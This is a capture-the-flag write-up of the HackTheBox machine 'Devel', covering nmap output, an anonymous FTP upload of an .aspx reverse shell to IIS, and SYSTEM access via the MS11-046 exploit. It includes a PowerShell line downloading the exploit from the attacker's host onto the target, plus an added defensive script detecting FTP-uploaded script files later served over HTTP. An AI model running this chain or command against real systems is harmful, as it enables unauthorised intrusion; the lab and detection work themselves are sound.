Devel

Welcome back! Here we have a very old HackTheBox easy machine, which for that reason is really simple, but let's start as usual by running nmap.

┌──(kali㉿kali)-[~/diego/Hack_the_box/Machines/Devel]
└─$ sudo nmap -sS -sC -sV --script=vuln -oN scans/nmap.txt 10.10.10.5
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-22 14:50 EDT
Nmap scan report for 10.10.10.5
Host is up (0.056s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| vulners:
|   cpe:/a:microsoft:internet_information_services:7.5:
|       CVE-2010-3972   10.0    https://vulners.com/cve/CVE-2010-3972
|       SSV:20122       9.3     https://vulners.com/seebug/SSV:20122    *EXPLOIT*
|       CVE-2010-2730   9.3     https://vulners.com/cve/CVE-2010-2730
|       SSV:20121       4.3     https://vulners.com/seebug/SSV:20121    *EXPLOIT*
|_      CVE-2010-1899   4.3     https://vulners.com/cve/CVE-2010-1899
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 253.22 seconds

As always we have a website that we can visit.

This is the typical default page of Windows IIS, where there is nothing to do, but from nmap we can see that the FTP port is open, and maybe we can log in anonymously.

And we are in! By listing the files we can see all the pages that are reachable from the site, like welcome.png.

We can now try to upload custom files, like a reverse shell in PHP or Python.

As you can see, neither of them seems to be readable from the website, so we should think about which executable extension is allowed, and since there is an aspnet_client directory, maybe we can use the .aspx extension.

It works, so now we can upload an .aspx reverse shell found online. We just need to upload it and visit the page while listening on that port.
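From the defender's side, the chain above (an anonymous FTP upload of a script file followed by a request for it over HTTP) leaves a clear trace in the IIS FTP and HTTP logs. The following script is an added example, not part of the original writeup: it parses W3C extended log text using the #Fields header, and reports script files that were STORed over FTP and then fetched over HTTP within a time window. The log lines and the IP addresses in them are constructed sample data; the field layout mirrors IIS W3C logs but is read from the header, so it adapts to whatever fields a given server logs.

```python
"""Flag server-side script files uploaded over FTP and then requested over HTTP.
Sample IIS W3C log lines below are constructed for this example."""
from datetime import datetime

# Extensions IIS hands to a script handler instead of serving as static content.
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx")

def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields header names."""
    fields, rows = [], []
    for line in text.strip().splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # field names follow the directive
        elif line.startswith("#") or not line.strip():
            continue                           # other directives, blank lines
        else:
            rows.append(dict(zip(fields, line.split())))
    return rows

def _ts(row):
    return datetime.fromisoformat(row["date"] + " " + row["time"])

def find_upload_then_execute(ftp_log, http_log, window_seconds=3600):
    """One finding per script file STORed over FTP, then fetched (HTTP 200) within window_seconds."""
    uploads = {}
    for r in parse_w3c(ftp_log):
        if r.get("cs-method") == "STOR" and r["cs-uri-stem"].lower().endswith(SCRIPT_EXT):
            uploads["/" + r["cs-uri-stem"].lower().lstrip("/")] = r
    findings = []
    for r in parse_w3c(http_log):
        up = uploads.get(r["cs-uri-stem"].lower())
        if up and r["sc-status"] == "200":
            delta = (_ts(r) - _ts(up)).total_seconds()
            if 0 <= delta <= window_seconds:
                findings.append({"path": r["cs-uri-stem"], "ftp_user": up["cs-username"],
                                 "uploader": up["c-ip"], "requester": r["c-ip"],
                                 "seconds_after_upload": delta})
    return findings

FTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2023-07-22 18:50:20 10.10.14.204 anonymous 10.10.10.5 21 STOR welcome.png 226 0
2023-07-22 18:51:40 10.10.14.204 anonymous 10.10.10.5 21 STOR shell.aspx 226 0
"""
HTTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2023-07-22 18:49:00 10.10.10.5 GET /welcome.png - 80 - 10.10.14.204 Mozilla/5.0 200 0 0 15
2023-07-22 18:52:10 10.10.10.5 GET /shell.aspx - 80 - 10.10.14.204 Mozilla/5.0 200 0 0 312
"""
```

Running find_upload_then_execute(FTP_LOG, HTTP_LOG) on the sample data yields one finding for /shell.aspx uploaded by the anonymous user 30 seconds before it was requested; the welcome.png upload is ignored because it is not a script extension.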

Privilege Escalation

On this machine we won't be able to read the user flag until we get to admin, because we are not allowed to enter the user's directory, but by looking at the system information we can get some interesting details.

As you can see we have a pretty old Windows version without any hotfix, and by looking for it online we found an interesting page.

We even have the EDB-ID, which we can use to fetch the exploit from searchsploit.

Now we need to compile the code in the way described for the CVE.

So just compile it and transfer it via a Python HTTP server:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.204:8000/MS11-046.exe', 'C:\Windows\Temp\MS11-046.exe')"

And here is the exploit execution.

Now we are SYSTEM, and so we can fetch all the flags:

c:\>type \Users\babis\Desktop\user.txt
type \Users\babis\Desktop\user.txt
aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX6

c:\>type \Users\administrator\Desktop\root.txt
type \Users\administrator\Desktop\root.txt
6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5

Just like this we solved the machine.

0xCY@